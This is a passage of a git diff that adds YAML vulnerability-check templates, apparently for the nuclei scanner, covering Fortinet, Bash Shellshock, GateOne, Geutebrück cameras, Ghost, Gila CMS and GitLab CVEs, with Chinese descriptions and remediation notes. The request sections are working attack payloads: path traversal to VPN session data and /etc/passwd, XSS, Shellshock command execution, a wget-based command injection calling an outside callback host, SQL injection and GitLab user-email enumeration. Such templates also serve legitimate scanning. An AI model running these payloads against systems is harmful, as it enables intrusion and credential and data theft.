+ part: header + regex: + - (?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$ + path: + - '{{BaseURL}}/login?redir=http://www.example.com' + method: GET diff --git a/config/51pwn/yaml/Fortinet FortiOS /CVE-2018-13379.yaml b/config/51pwn/yaml/Fortinet FortiOS /CVE-2018-13379.yaml new file mode 100755 index 000000000..5bf366f19 --- /dev/null +++ b/config/51pwn/yaml/Fortinet FortiOS /CVE-2018-13379.yaml @@ -0,0 +1,39 @@ +id: CVE-2018-13379 +info: + name: Fortinet FortiOS - Credentials Disclosure + author: + - l0ne1y + tags: + - cve + - cve2018 + - fortios + description: |- + Fortinet FortiOS 路径遍历漏洞 + Fortinet FortiOS是美国飞塔(Fortinet)公司的一套专用于FortiGate网络安全平台上的安全操作系统。该系统为用户提供防火墙、防病毒、IPSec/SSLVPN、Web内容过滤和反垃圾邮件等多种安全功能。 + + Fortinet FortiOS 5.6.3版本至5.6.7版本和6.0.0版本至6.0.4版本中的SSL VPN Web门户存在路径遍历漏洞。该漏洞源于网络系统或产品未能正确地过滤资源或文件路径中的特殊元素。攻击者可利用该漏洞访问受限目录之外的位置。 + reference: + - https://fortiguard.com/advisory/fg-ir-18-384 + - https://www.fortiguard.com/psirt/fg-ir-20-233 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-13379 + severity: critical + classification: + cve-id: + - cve-2018-13379 + cwe-id: + - cwe-22 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + remediation: "**官方修复方案**\n目前厂商已发布升级补丁以修复漏洞,补丁获取链接:\nhttps://fortiguard.com/psirt/FG-IR-18-384\n\n**临时修复方案**\n1、系统开发阶段的防御,在系统开发阶段应充分考虑系统的安全性,对目录遍历漏洞来说,需对用户提交的内容进行严格的过滤,这里主要指过滤目录跳转符,字符截断符,dir命令等。\n2、系统运行阶段的防御,系统运维人员需有强烈的安全意识,他们的一举一动都会影响用户的个人隐私信息安全。对系统运维人员来说,部署新的业务系统或者安装新的软件或应用后应通过web扫描工具积极查找系统是否存在目录遍历漏洞,尽可能不要在服务器上安装与业务不相关的第三方软件以避免引入目录遍历漏洞。除此之外,还应该合理配置web服务器(禁止目录浏览,分配好目录权限等)并积极关注所使用的各种软件和应用的版本发布情况,及时升级新的软件版本。'\n3、服务器配置,为更好的保护系统安全,实际生产环境和测试开发环境应该隔离。在生产环境中的任何改动,都需要严格遵循变更管理流程,做到执行人、执行时间、执行对象和具体改动均记录在案,并有企业信息安全部门进行事前审核和事后审计。技术人员一般不要直接调试生产系统,可以在测试环境中调试完成后再更新生产系统,以避免调试过程中开启某些接口、更改某些配置或者保存某些调试信息造成安全隐患。如果非要在线调试生产系统,而且需要保存调试信息时,应避免将调试信息直接保存到服务器本地,同时调试完成后应第一时间删除相关调试信息并恢复系统配置。\n + \ 1)IIS:打开 IIS 管理器,然后导航至您要管理的级别;在“功能视图”中,双击“目录浏览”;在“操作”窗格中,选择“目录浏览”功能,单击“禁用”。\n + \ 2)Nginx:找到Nginx配置文件中的“autoindex”,设置为“off”,然后重启Nginx。\n 3)Apache:修配置文件httpd.conf,把:Options + Indexes FollowSymLinks 改为:Options -Indexes FollowSymLinks ,然后重启Apache。\n 4)Tomcat:在应用的WEB-INF目录找到web.xml配置文件,将“listings”参数的初始化值设置为“false”,然后重启Tomcat。 + \ \n4、安全设备的防御,进行目录遍历攻击时,攻击者基本都会使用目录跳转符,同时可能配合使用字符截断符,dir命令等。对专业的安全设备来说通过检测特定语法下的目录跳转符,字符截断符,以及与查看目录相关的命令即可识别各种目录遍历攻击。部署专业的安全设备不仅可以很好的保护业务系统自身的目录遍历漏洞,同时还能防御web服务器和服务器上其他非业务相关的第三方应用漏洞引发的目录遍历攻击。" +requests: +- matchers: + - type: word + words: + - var fgt_lang + path: + - '{{BaseURL}}/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession' + method: GET diff --git a/config/51pwn/yaml/Fortinet FortiOS /CVE-2018-13380.yaml b/config/51pwn/yaml/Fortinet FortiOS /CVE-2018-13380.yaml new file mode 100755 index 000000000..8030a0104 --- /dev/null +++ b/config/51pwn/yaml/Fortinet FortiOS /CVE-2018-13380.yaml @@ -0,0 +1,57 @@ +id: CVE-2018-13380 +info: + name: Fortinet FortiOS Cross-Site Scripting + author: + - l0ne1y + tags: + - cve + - cve2018 + - fortios + - xss + - fortinet + description: |- + Fortinet FortiOS 跨站脚本漏洞 + Fortinet FortiOS是美国飞塔(Fortinet)公司的一套专用于FortiGate网络安全平台上的安全操作系统。该系统为用户提供防火墙、防病毒、IPSec/SSLVPN、Web内容过滤和反垃圾邮件等多种安全功能。 + + Fortinet FortiOS 6.0.0版本至6.0.4版本、5.6.0版本至5.6.7版本和5.4及之前版本中的SSL VPN Web门户存在跨站脚本漏洞。该漏洞源于WEB应用缺少对客户端数据的正确验证。攻击者可利用该漏洞执行客户端代码。 + reference: + - https://nvd.nist.gov/vuln/detail/cve-2018-13380 + - https://blog.orange.tw/2019/08/attacking-ssl-vpn-part-2-breaking-the-fortigate-ssl-vpn.html + - https://fortiguard.com/advisory/fg-ir-18-383 + - https://fortiguard.com/advisory/fg-ir-20-230 + severity: medium + classification: + cve-id: + - cve-2018-13380 + cwe-id: + - cwe-79 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + remediation: |- + **官方修复方案** + 目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + https://fortiguard.com/psirt/FG-IR-18-383 + + **临时修复方案** + 对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。 +requests: +- matchers: + - type: word + condition: or + part: body + words: + - + - + - type: word + part: header + negative: true + words: + - application/json + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/message?title=x&msg=%26%23%3Csvg/onload=alert(1337)%3E%3B' + - '{{BaseURL}}/remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1337)%3C/script%3E' + method: GET diff --git a/config/51pwn/yaml/Fortinet FortiWeb/CVE-2021-22122.yaml b/config/51pwn/yaml/Fortinet FortiWeb/CVE-2021-22122.yaml new file mode 100755 index 000000000..243d10bf2 --- /dev/null +++ b/config/51pwn/yaml/Fortinet FortiWeb/CVE-2021-22122.yaml @@ -0,0 +1,30 @@ +id: CVE-2021-22122 +info: + name: FortiWeb v6.3.x-6.2.x Unauthenticated XSS + author: + - dwisiswant0 + description: |- + Fortinet FortiWeb 跨站脚本漏洞 + Fortinet FortiWeb是美国飞塔(Fortinet)公司的一款Web应用层防火墙,它能够阻断如跨站点脚本、SQL注入、Cookie中毒、schema中毒等攻击的威胁,保证Web应用程序的安全性并保护敏感的数据库内容。 + + FortiWeb 6.3.7 and below 和 versions 6.2.3 and below存在跨站脚本漏洞,该漏洞允许一个未经身份验证的远程攻击者执行反映跨站脚本攻击(XSS)。 + severity: medium + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序:https://www.johnsoncontrols.com/cyber-solutions/security-advisories + + 临时修复方案: + 1、对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。' +requests: +- matchers: + - type: word + condition: and + part: body + words: + - nuclei + - No policy has been chosen. + matchers-condition: and + path: + - '{{BaseURL}}/error3?msg=30&data='';alert(''nuclei'');//' + - '{{BaseURL}}/omni_success?cmdb_edit_path=");alert(''nuclei'');//' + method: GET diff --git a/config/51pwn/yaml/GNU Bash/CVE-2014-6271.yaml b/config/51pwn/yaml/GNU Bash/CVE-2014-6271.yaml new file mode 100755 index 000000000..e21c2636a --- /dev/null +++ b/config/51pwn/yaml/GNU Bash/CVE-2014-6271.yaml @@ -0,0 +1,43 @@ +id: CVE-2014-6271 +info: + name: ShellShock - Remote Code Execution + author: + - l0ne1y + description: |- + GNU Bash 环境变量远程命令执行漏洞 + GNU Bash(Bourne again shell)是一个为GNU计划编写的Unix shell。 + GNU Bash 4.3及之前版本在处理某些构造的环境变量时存在安全漏洞,向环境变量值内的函数定义后添加多余的字符串会触发此漏洞,攻击者可利用此漏洞改变或绕过环境限制,以执行shell命令。某些服务和应用允许未经身份验证的远程攻击者提供环境变量以利用此漏洞。此漏洞源于在调用bash shell之前可以用构造的值创建环境变量。这些变量可以包含代码,在shell被调用后会被立即执行。 + 此漏洞可能会影响到使用ForceCommand功能的OpenSSH sshd、使用mod_cgi或mod_cgid的Apache服务器、DHCP客户端、其他使用bash作为解释器的应用等。 + 目前认为使用`mod_php/mod_python/mod_perl`的Apache httpd不受此问题影响。 + severity: critical + remediation: |- + **官方修复方案:** + 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: + + http://www.gnu.org/software/bash + http://ftp.gnu.org/gnu/bash/ +requests: +- matchers: + - type: status + status: + - 200 + - type: regex + part: body + regex: + - 'root:.*:0:0:' + matchers-condition: and + path: + - '{{BaseURL}}' + - '{{BaseURL}}/cgi-bin/status' + - '{{BaseURL}}/cgi-bin/stats' + - '{{BaseURL}}/cgi-bin/test' + - '{{BaseURL}}/cgi-bin/status/status.cgi' + - '{{BaseURL}}/test.cgi' + - '{{BaseURL}}/debug.cgi' + - '{{BaseURL}}/cgi-bin/test-cgi' + method: GET + headers: + Cookie: '() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd ' + Referer: '() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd ' + Shellshock: '() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd ' + stop-at-first-match: true diff --git a/config/51pwn/yaml/GateOne/CVE-2020-35736.yaml b/config/51pwn/yaml/GateOne/CVE-2020-35736.yaml new file mode 100755 index 000000000..5302aa110 --- /dev/null +++ b/config/51pwn/yaml/GateOne/CVE-2020-35736.yaml @@ -0,0 +1,44 @@ +id: CVE-2020-35736 +info: + name: GateOne 1.1 - Arbitrary File Retrieval + author: + - l0ne1y + tags: + - cve + - cve2020 + - gateone + - lfi + description: |- + Liftoff GateOne 路径遍历漏洞 + Liftoff GateOne是Liftoff个人开发者的一个基于HTML5的可提供终端、ssh client功能的工具软件。 + + GateOne 1.1 存在路径遍历漏洞,该漏洞允许/downloads/路径遍历,任意文件下载,无需通过下载验证。因为os.path.join是滥用。 + reference: + - /~https://github.com/liftoff/gateone/issues/747 + - https://nvd.nist.gov/vuln/detail/cve-2020-35736 + - https://rmb122.com/2019/08/28/ogeek-easy-realworld-challenge-1-2-writeup/ + severity: high + classification: + cve-id: + - cve-2020-35736 + cwe-id: + - cwe-22 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + remediation: "**官方修复方案**\n建议使用此软件的用户随时关注厂商主页或参考网址以获取解决办法:\n/~https://github.com/liftoff/GateOne/issues/747\n\n**临时修复方案**\n1、系统开发阶段的防御,在系统开发阶段应充分考虑系统的安全性,对目录遍历漏洞来说,需对用户提交的内容进行严格的过滤,这里主要指过滤目录跳转符,字符截断符,dir命令等。\n2、系统运行阶段的防御,系统运维人员需有强烈的安全意识,他们的一举一动都会影响用户的个人隐私信息安全。对系统运维人员来说,部署新的业务系统或者安装新的软件或应用后应通过web扫描工具积极查找系统是否存在目录遍历漏洞,尽可能不要在服务器上安装与业务不相关的第三方软件以避免引入目录遍历漏洞。除此之外,还应该合理配置web服务器(禁止目录浏览,分配好目录权限等)并积极关注所使用的各种软件和应用的版本发布情况,及时升级新的软件版本。'\n3、服务器配置,为更好的保护系统安全,实际生产环境和测试开发环境应该隔离。在生产环境中的任何改动,都需要严格遵循变更管理流程,做到执行人、执行时间、执行对象和具体改动均记录在案,并有企业信息安全部门进行事前审核和事后审计。技术人员一般不要直接调试生产系统,可以在测试环境中调试完成后再更新生产系统,以避免调试过程中开启某些接口、更改某些配置或者保存某些调试信息造成安全隐患。如果非要在线调试生产系统,而且需要保存调试信息时,应避免将调试信息直接保存到服务器本地,同时调试完成后应第一时间删除相关调试信息并恢复系统配置。\n + \ 1)IIS:打开 IIS 管理器,然后导航至您要管理的级别;在“功能视图”中,双击“目录浏览”;在“操作”窗格中,选择“目录浏览”功能,单击“禁用”。\n + \ 2)Nginx:找到Nginx配置文件中的“autoindex”,设置为“off”,然后重启Nginx。\n 3)Apache:修配置文件httpd.conf,把:Options + Indexes FollowSymLinks 改为:Options -Indexes FollowSymLinks ,然后重启Apache。\n 4)Tomcat:在应用的WEB-INF目录找到web.xml配置文件,将“listings”参数的初始化值设置为“false”,然后重启Tomcat。 + \ \n4、安全设备的防御,进行目录遍历攻击时,攻击者基本都会使用目录跳转符,同时可能配合使用字符截断符,dir命令等。对专业的安全设备来说通过检测特定语法下的目录跳转符,字符截断符,以及与查看目录相关的命令即可识别各种目录遍历攻击。部署专业的安全设备不仅可以很好的保护业务系统自身的目录遍历漏洞,同时还能防御web服务器和服务器上其他非业务相关的第三方应用漏洞引发的目录遍历攻击。" +requests: +- matchers: + - type: regex + regex: + - 'root:.*:0:0:' + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/downloads/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd' + method: GET diff --git "a/config/51pwn/yaml/Geutebr\303\274ck G-Cam E2 /CVE-2021-33544.yaml" "b/config/51pwn/yaml/Geutebr\303\274ck G-Cam E2 /CVE-2021-33544.yaml" new file mode 100755 index 000000000..6ff08b908 --- /dev/null +++ "b/config/51pwn/yaml/Geutebr\303\274ck G-Cam E2 /CVE-2021-33544.yaml" @@ -0,0 +1,49 @@ +id: CVE-2021-33544 +info: + name: Geutebruck RCE + author: + - gy741 + tags: + - cve + - cve2021 + - geutebruck + - rce + - oast + description: |- + Geutebrück G-Cam E2 命令注入漏洞 + Geutebrück G-Cam E2是manualslib的一个摄像机。 + + Geutebrück G-Cam E2 存在命令注入漏洞,该漏洞源于受影响的产品容易受到命令注入的攻击。这可能允许攻击者可利用该漏洞远程执行任意代码。受影响的产品及版本:E2 Series cameras – G-CAM:1.12.0.27版本及之前版本、1.12.13.2版本、1.12.14.5版本;Encoder G-Code:1.12.0.27版本及之前版本、1.12.13.2版本、1.12.14.5版本。 + reference: + - https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/ + - https://www.randorisec.fr/fr/udp-technology-ip-camera-vulnerabilities/ + - https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03 + severity: high + classification: + cve-id: + - cve-2021-33544 + cwe-id: + - cwe-77 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序:https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03 + + 临时修复方案: + 1、尽量不去执行外部的应用程序或命令。 + 2、使用自定义函数或函数库实现外部应用程序或命令的功能。 + 3、在执行system、eval等命令执行功能的函数前,校验参数内容。 + 4、使用escapeshellarg函数处理相关参数。Escapeshellarg函数会将任何引起参数或命令结束的字符进行转义,如单引号“’”会被转义为“\\’”,双引号“””会被转义为“\\””,分号“;”会被转义为“\\;”,这样escapeshellarg会将参数内容限制在一对单引号或双引号里面,转义参数中所包含的单引号或双引号,使其无法对当前执行进行截断,实现防范命令注入攻击的目的。 + 5、使用safe_mode_exec_dir执行可执行的文件路径。将php.ini文件中的safe_mode设置为On,然后将允许执行的文件放入一个目录中,并使用safe_mode_exec_dir指定这个可执行的文件路径。在需要执行相应的外部程序时,程序必须在safe_mode_exec_dir指定的目录中才会允许执行,否则执行将失败。' +requests: +- matchers: + - type: word + part: interactsh_protocol + words: + - http + raw: + - | + GET //uapi-cgi/certmngr.cgi?action=createselfcert&local=anything&country=AA&state=%24(wget%20http://{{interactsh-url}})&organization=anything&organizationunit=anything&commonname=anything&days=1&type=anything HTTP/1.1 + Host: {{Hostname}} + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 diff --git a/config/51pwn/yaml/Ghost CMS/CVE-2021-29484.yaml b/config/51pwn/yaml/Ghost CMS/CVE-2021-29484.yaml new file mode 100755 index 000000000..0f97d5db5 --- /dev/null +++ b/config/51pwn/yaml/Ghost CMS/CVE-2021-29484.yaml @@ -0,0 +1,52 @@ +id: CVE-2021-29484 +info: + name: DOM XSS in Ghost CMS + author: + - rootxharsh + - iamnoooob + tags: + - cve + - cve2021 + - xss + - ghost + description: |- + Ghost CMS 跨站脚本漏洞 + Ghost CMS是新加坡Ghost基金会的一套使用JavaScript编写的开源无头内容管理系统(CMS)。 + + Ghost CMS 存在跨站脚本漏洞,攻击者可利用该漏洞可以通过让登录用户点击包含恶意代码的链接来获得访问权限,用户不需要输入凭证。 + reference: + - /~https://github.com/tryghost/ghost/security/advisories/ghsa-9fgx-q25h-jxrg + - https://nvd.nist.gov/vuln/detail/cve-2021-29484 + - https://www.npmjs.com/package/ghost + - https://forum.ghost.org/t/critical-security-update-available-for-ghost-4-x/22290 + severity: medium + classification: + cve-id: + - cve-2021-29484 + cwe-id: + - cwe-79 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序:https://forum.ghost.org/t/critical-security-update-available-for-ghost-4-x/22290 + + 临时修复方案: + 1、对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。' +requests: +- matchers: + - type: word + part: body + words: + - XMLHttpRequest.prototype.open + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/ghost/preview' + method: GET diff --git a/config/51pwn/yaml/Gila CMS/CVE-2020-5515.yaml b/config/51pwn/yaml/Gila CMS/CVE-2020-5515.yaml new file mode 100755 index 000000000..5885b89ba --- /dev/null +++ b/config/51pwn/yaml/Gila CMS/CVE-2020-5515.yaml @@ -0,0 +1,36 @@ +id: CVE-2020-5515 +info: + name: GilaCMS 1.11.8 – ‘/admin/sql?query=’ SQL Injection + author: + - l0ne1y + description: |- + Gila CMS SQL注入漏洞 + Gila CMS是一套基于PHP和MySQL的开源内容管理系统(CMS)。 + + Gila CMS 1.11.8版本中的/admin/sql?query=存在SQL注入漏洞。该漏洞源于基于数据库的应用缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行非法SQL命令。 + reference: + - https://infosecdb.wordpress.com/2020/01/05/gilacms-1-11-8-admin-sqlquery-sql-injection/ + severity: high + remediation: |- + **官方修复方案** + 使用此软件的用户随时关注厂商主页或参考网址以获取解决办法: + https://gilacms.com/ + + **临时修复方案** + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: word + part: body + words: + - '{{randstr}}' + path: + - '{{BaseURL}}/admin/sql?query=SELECT%20{{randstr}}' + method: GET diff --git a/config/51pwn/yaml/GitLab/CVE-2020-26413.yaml b/config/51pwn/yaml/GitLab/CVE-2020-26413.yaml new file mode 100755 index 000000000..269d1d883 --- /dev/null +++ b/config/51pwn/yaml/GitLab/CVE-2020-26413.yaml @@ -0,0 +1,75 @@ +id: CVE-2020-26413 +info: + name: Gitlab User enumeration via Graphql API + author: + - l0ne1y + tags: + - cve + - cve2020 + - gitlab + - exposure + - enum + - graphql + description: |- + Gitlab graphql 敏感信息泄漏漏洞 + GitLab是美国GitLab公司的一款使用Ruby on Rails开发的、自托管的、Git(版本控制系统)项目仓库应用程序。该程序可用于查阅项目的文件内容、提交历史、Bug列表等。 + + GitLab CE/EE 13.4 - 13.6.2版本存在信息泄露漏洞,该漏洞源于通过GraphQL公开信息会导致用户邮箱和用户名信息被泄漏。 + reference: + - https://gitlab.com/gitlab-org/gitlab/-/issues/244275 + - https://gitlab.com/gitlab-org/cves/-/blob/master/2020/cve-2020-26413.json + - https://nvd.nist.gov/vuln/detail/cve-2020-26413 + severity: medium + metadata: + shodan-query: http.title:"GitLab" + classification: + cve-id: + - cve-2020-26413 + cwe-id: + - cwe-200 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + remediation: |- + **官方修复方案** + 使用此软件的用户随时关注厂商主页或参考网址以获取解决办法: + https://gitlab.com/gitlab-org/cves/-/blob/master/2020/CVE-2020-26413.json + + **临时修复方案** + 1、去除页面、cookie或缓存中涉及的敏感信息或删除泄露信息页面 + 2、将敏感信息进行加密存储,非必要不可发送前端 + 3、发送敏感信息时需加密传输,如有必要需脱敏处理 + 4、禁止用自己开发的加密算法,必须使用公开、安全的标准加密算法。 + 5、禁止在日志中记录明文的敏感数据:禁止在日志中记录明文的敏感数据(如口 + 令、会话标识jsessionid等), 防止敏感信息泄漏。 + 6、禁止带有敏感数据的Web页面缓存:带有敏感数据的Web页面都应该禁止缓 + 存,以防止敏感信息泄漏或通过代理服务器上网的用户数据互窜问题。 + 7、对必须发送的敏感数据或页面请求接口做好严格的权限认证 +requests: +- matchers: + - type: word + condition: and + part: body + words: + - '"username":' + - '"avatarUrl":' + - '"node":' + - type: status + status: + - 200 + extractors: + - type: json + json: + - .data.users.edges[].node.email + part: body + matchers-condition: and + raw: + - | + POST /api/graphql HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + { + "query": "{\nusers {\nedges {\n node {\n username\n email\n avatarUrl\n status {\n emoji\n message\n messageHtml\n }\n }\n }\n }\n }", + "variables": null, + "operationName": null + } diff --git a/config/51pwn/yaml/GitLab/CVE-2021-22205.yaml b/config/51pwn/yaml/GitLab/CVE-2021-22205.yaml new file mode 100755 index 000000000..c1727ceca --- /dev/null +++ b/config/51pwn/yaml/GitLab/CVE-2021-22205.yaml @@ -0,0 +1,155 @@ +id: CVE-2021-22205 +info: + name: GitLab CE/EE - Remote Code Execution + author: + - l0ne1y + tags: + - cve + - cve2021 + - gitlab + - rce + description: |- + Gitlab exiftool 远程命令执行漏洞 + GitLab 是由GitLab Inc.开发,一款基于Git 的完全集成的软件开发平台。2021年4月14日 Gitlab 官方发布安全更新,披露了CVE-2021-22205 Gitlab exiftool 远程命令执行漏洞,攻击者通过上传恶意图片可触发远程命令执行,控制服务器。 + + 影响版本 + + 11.9 <= GitLab(CE/EE)< 13.8.8 + + 13.9 <= GitLab(CE/EE)< 13.9.6 + + 13.10 <= GitLab(CE/EE)< 13.10.3 + + 安全版本 + + GitLab(CE/EE) 13.8.8 + + GitLab(CE/EE) 13.9.6 + + GitLab(CE/EE) 13.10.3 + reference: + - https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/red-team-research/cve-2021-22205-hash-generator + - https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/red-team-operations/-/issues/196 + - https://gitlab.com/gitlab-org/cves/-/blob/master/2021/cve-2021-22205.json + - https://censys.io/blog/cve-2021-22205-it-was-a-gitlab-smash/ + - https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild/ + - https://hackerone.com/reports/1154542 + - https://nvd.nist.gov/vuln/detail/cve-2021-22205 + severity: critical + metadata: + shodan-query: http.title:"GitLab" + classification: + cve-id: + - cve-2021-22205 + cwe-id: + - cwe-20 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + remediation: |- + **官方修复方案** + 目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + https://about.gitlab.com/releases/2021/04/14/security-release-gitlab-13-10-3-released/ +requests: +- matchers: + - type: word + condition: or + words: + - 015d088713b23c749d8be0118caeb21039491d9812c75c913f48d53559ab09df + - 02aa9533ec4957bb01d206d6eaa51d762c7b7396362f0f7a3b5fb4dd6088745b + - 051048a171ccf14f73419f46d3bd8204aa3ed585a72924faea0192f53d42cfce + - 08858ced0ff83694fb12cf155f6d6bf450dcaae7192ea3de8383966993724290 + - 0993beabc8d2bb9e3b8d12d24989426b909921e20e9c6a704de7a5f1dfa93c59 + - 0a5b4edebfcb0a7be64edc06af410a6fbc6e3a65b76592a9f2bcc9afea7eb753 + - 1084266bd81c697b5268b47c76565aa86b821126a6b9fe6ea7b50f64971fc96f + - 14c313ae08665f7ac748daef8a70010d2ea9b52fd0cae594ffa1ffa5d19c43f4 + - 1626b2999241b5a658bddd1446648ed0b9cc289de4cc6e10f60b39681a0683c4 + - 20f01320ba570c73e01af1a2ceb42987bcb7ac213cc585c187bec2370cf72eb6 + - 27d2c4c4e2fcf6e589e3e1fe85723537333b087003aa4c1d2abcf74d5c899959 + - 292ca64c0c109481b0855aea6b883a588bd293c6807e9493fc3af5a16f37f369 + - 2eaf7e76aa55726cc0419f604e58ee73c5578c02c9e21fdbe7ae887925ea92ae + - 30a9dffe86b597151eff49443097496f0d1014bb6695a2f69a7c97dc1c27828f + - 318ee33e5d14035b04832fa07c492cdf57788adda50bb5219ef75b735cbf00e2 + - 33313f1ff2602ef43d945e57e694e747eb00344455ddb9b2544491a3af2696a1 + - 335f8ed58266e502d415f231f6675a32bb35cafcbaa279baa2c0400d4a9872ac + - 34031b465d912c7d03e815c7cfaff77a3fa7a9c84671bb663026d36b1acd3f86 + - 3407a4fd892e9d5024f3096605eb1e25cad75a8bf847d26740a1e6a77e45b087 + - 340c31a75c5150c5e501ec143849adbed26fed0da5a5ee8c60fb928009ea3b86 + - 38981e26a24308976f3a29d6e5e2beef57c7acda3ad0d5e7f6f149d58fd09d3d + - 3963d28a20085f0725884e2dbf9b5c62300718aa9c6b4b696c842a3f4cf75fcd + - 39b154eeefef684cb6d56db45d315f8e9bf1b2cc86cf24d8131c674521f5b514 + - 39fdbd63424a09b5b065a6cc60c9267d3f49950bf1f1a7fd276fe1ece4a35c09 + - 3b51a43178df8b4db108a20e93a428a889c20a9ed5f41067d1a2e8224740838e + - 3cbf1ae156fa85f16d4ca01321e0965db8cfb9239404aaf52c3cebfc5b4493fb + - 40d8ac21e0e120f517fbc9a798ecb5caeef5182e01b7e7997aac30213ef367b3 + - 4448d19024d3be03b5ba550b5b02d27f41c4bdba4db950f6f0e7136d820cd9e1 + - 450cbe5102fb0f634c533051d2631578c8a6bae2c4ef1c2e50d4bfd090ce3b54 + - 455d114267e5992b858fb725de1c1ddb83862890fe54436ffea5ff2d2f72edc8 + - 4568941e60dbfda3472e3f745cd4287172d4e6cce44bed85390af9e4e2112d0b + - 45b2cf643afd34888294a073bf55717ea00860d6a1dca3d301ded1d0040cac44 + - 473ef436c59830298a2424616d002865f17bb5a6e0334d3627affa352a4fc117 + - 4990bb27037f3d5f1bffc0625162173ad8043166a1ae5c8505aabe6384935ce2 + - 4a081f9e3a60a0e580cad484d66fbf5a1505ad313280e96728729069f87f856e + - 4abc4e078df94075056919bd59aed6e7a0f95067039a8339b8f614924d8cb160 + - 504940239aafa3b3a7b49e592e06a0956ecaab8dbd4a5ea3a8ffd920b85d42eb + - 52560ba2603619d2ff1447002a60dcb62c7c957451fb820f1894e1ce7c23821c + - 530a8dd34c18ca91a31fbae2f41d4e66e253db0343681b3c9640766bf70d8edf + - 5440e2dd89d3c803295cc924699c93eb762e75d42178eb3fe8b42a5093075c71 + - 62e4cc014d9d96f9cbf443186289ffd9c41bdfe951565324891dcf38bcca5a51 + - 64e10bc92a379103a268a90a7863903eacb56843d8990fff8410f9f109c3b87a + - 655ad8aea57bdaaad10ff208c7f7aa88c9af89a834c0041ffc18c928cc3eab1f + - 67ac5da9c95d82e894c9efe975335f9e8bdae64967f33652cd9a97b5449216d2 + - 69a1b8e44ba8b277e3c93911be41b0f588ac7275b91a184c6a3f448550ca28ca + - 6ae610d783ba9a520b82263f49d2907a52090fecb3ac37819cea12b67e6d94fb + - 70ce56efa7e602d4b127087b0eca064681ecdd49b57d86665da8b081da39408b + - 